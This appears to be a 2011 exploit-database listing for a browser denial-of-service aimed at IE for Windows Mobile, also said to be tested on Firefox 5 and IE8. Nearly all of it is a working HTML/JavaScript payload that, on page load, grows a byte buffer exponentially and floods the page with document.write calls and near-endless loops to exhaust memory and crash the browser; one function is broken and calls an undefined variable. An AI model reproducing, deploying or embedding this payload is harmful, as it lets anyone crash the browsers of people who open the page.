IE for Windowse Mobile Denial of Service



EKU-ID: 866 CVE: OSVDB-ID:
Author: Iman Halavati Published: 2011-08-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=====================================
IE for Windowse Mobile Denial of Service
=====================================

#Tested on:Firefox 5,IE8,IE for Windowse Mobile
# Author: Iman Halavati
# Verified: yes
##Greets To: My Laptop &  all My Friends(Sina Yazdanmehr)
##########################################################
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = '\x00\x13\xE8\x7C';
for (i =0;i<666;i++) {
buffer+=buffer+'\x00\x13\xE8\x7C';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
function Loop() {
var ajax = 'x13\xEC\0C';
for (a =0;a<99999999999;a++) {
ajax+=ajax+'x13\xEC\0C';
document.write('<html><marquee><h1>'+b+b);
}
}
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+5'>");
for (i =0;i<99999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('Ooops')
</script>